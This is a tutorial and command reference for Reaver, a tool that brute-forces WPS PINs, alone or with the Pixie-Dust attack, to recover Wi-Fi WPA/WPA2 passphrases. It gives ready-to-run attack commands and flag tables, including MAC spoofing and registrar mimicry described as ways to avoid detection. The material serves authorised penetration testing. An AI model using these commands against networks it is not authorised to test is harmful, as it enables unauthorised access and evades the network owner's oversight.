1. What is Reaver?
Reaver is a penetration testing tool designed to perform WPS (Wi-Fi Protected Setup) brute-force attacks against wireless networks. It targets routers with WPS enabled, exploiting vulnerabilities to recover the WPA/WPA2 passphrase. Reaver automates the process of guessing the WPS PIN, eventually revealing the network’s pre-shared key (PSK).
Key Features:
- Targets WPS-enabled routers.
- Automates PIN brute-forcing.
- Supports session resumption.
- Works with Pixie-Dust attack (via
-Kflag) for vulnerable routers. - Compatible with wash (to scan for WPS-enabled networks).
How Reaver Works
Reaver exploits the WPS protocol’s design flaw, which allows an attacker to brute-force the 8-digit PIN (reduced to 11,000 possibilities due to checksum validation). Once the PIN is cracked, the router reveals the WPA/WPA2 passphrase.
Steps:
- Scan for WPS-enabled networks (using
wash). - Launch Reaver against the target AP’s BSSID.
- Brute-force the WPS PIN (or use Pixie-Dust if supported).
- Retrieve the WPA/WPA2 passphrase upon successful PIN recovery.
Installation
Reaver is pre-installed in Kali Linux. If missing, install it via:
Bash
sudo apt update
sudo apt install reaverFor the latest version (with Pixie-Dust support):
Bash
sudo apt install reaver-wps-fork-t6xBasic Usage
Step 1: Identify WPS-Enabled Networks
Use wash to scan:
Bash
sudo wash -i wlan0-ispecifies the wireless interface (e.g.,wlan0).
Step 2: Launch Reaver Attack
Bash
sudo reaver -i wlan0 -b [BSSID] -vv-i: Interface (e.g.,wlan0).-b: Target AP’s BSSID (MAC address).-vv: Verbose output (for debugging).
Advanced Usage
Pixie-Dust Attack (Faster Exploitation)
Bash
sudo reaver -i wlan0 -b [BSSID] -K 1 -vv-K 1: Enables Pixie-Dust attack (works on vulnerable routers).
Custom Delays & Timeouts
Bash
sudo reaver -i wlan0 -b [BSSID] -d 5 -l 30 -N -vv-d 5: Delay between PIN attempts (5 sec).-l 30: Lock timeout after 30 failed attempts.-N: Skip WPS PIN confirmation.
Saving & Resuming Sessions
Bash
sudo reaver -i wlan0 -b [BSSID] -s session_file-s: Saves progress to a file for resumption.
Command-Line Options
Required Arguments
| Argument | Description | Example |
|---|---|---|
-i, --interface= | Monitor-mode interface (must be in monitor mode) | -i wlan0mon |
-b, --bssid= | Target AP’s MAC address (BSSID) | -b 00:11:22:33:44:55 |
Usage Note:
These two arguments are mandatory for any Reaver attack. Without them, the tool won’t execute.
Optional Arguments
| Argument | Description | Example |
|---|---|---|
-m, --mac= | Spoof MAC address (avoid detection) | -m DE:AD:BE:EF:13:37 |
-e, --essid= | Specify target AP’s ESSID (name) | -e "HomeWiFi" |
-c, --channel= | Lock to a specific channel (disables hopping) | -c 6 |
-s, --session= | Save/restore session progress | -s wps_session |
-C, --exec= | Run a command after PIN recovery | -C "echo PIN found!" |
-f, --fixed | Disable channel hopping (use with -c) | -f |
-5, --5ghz | Target 5GHz networks (rarely used) | -5 |
-v, --verbose | Verbosity level (-v, -vv, -vvv) | -vv |
-q, --quiet | Suppress non-critical output | -q |
Advanced Options
Timing & Performance Control
| Argument | Description | Recommended Value |
|---|---|---|
-d, --delay= | Delay between PIN attempts | -d 1 (default) |
-l, --lock-delay= | Wait time if AP locks WPS | -l 60 (default) |
-x, --fail-wait= | Sleep after 10 failures | -x 30 |
-r, --recurring-delay= | Sleep y sec every x attempts | -r 3:10 |
-t, --timeout= | Packet receive timeout | -t 5 |
-T, --m57-timeout= | M5/M7 timeout (DIR-300/320) | -T 0.5 |
Attack Optimization
| Argument | Description | Use Case |
|---|---|---|
-S, --dh-small | Use small DH keys (faster) | Slow routers |
-L, --ignore-locks | Ignore AP lock state | Stubborn APs |
-E, --eap-terminate | Send EAP FAIL to end session | Some enterprise APs |
-F, --ignore-fcs | Ignore checksum errors | Bad signal |
-w, --win7 | Mimic Windows 7 registrar | Avoid detection |
Pixie-Dust Attack (Critical)
| Argument | Description | Example |
|---|---|---|
-K, --pixie-dust | Run Pixie-Dust attack | -K |
-Z | Alternate Pixie-Dust flag | -Z |
-O, --output-file= | Save interesting packets | -O dump.pcap |
Practical Examples
1. Basic WPS PIN Brute-Force
Bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv2. Pixie-Dust Attack (Fast Exploitation)
Bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv3. Custom Timing & Session Saving
Bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -d 3 -l 45 -s my_session -vv4. MAC Spoofing + Channel Lock
Bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -m DE:AD:BE:EF:13:37 -c 6 -f -vv5. Post-Success Command Execution
Bash
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -C "notify-send 'WPS PIN Found!'" -vvReal-World Use Cases
- Penetration Testing: Auditing WPS vulnerabilities in a network.
- Wi-Fi Security Research: Testing router resilience against WPS attacks.
- Ethical Hacking: Recovering lost passwords (with permission).
- Network Forensics: Analyzing WPS weaknesses in enterprise setups.
Troubleshooting
Common Issues & Fixes
| Problem | Solution |
|---|---|
| “Failed to associate with AP” | Ensure monitor mode (airmon-ng start wlan0) |
| “WPS transaction failed” | Router may have locked WPS; wait and retry |
| “No WPS-enabled APs found” | Use wash to verify WPS status |
| Slow brute-forcing | Use -K (Pixie-Dust) if supported |
| Permission denied | Run with sudo |
Enabling Monitor Mode
Bash
sudo airmon-ng start wlan0
sudo reaver -i wlan0mon -b [BSSID] -vv
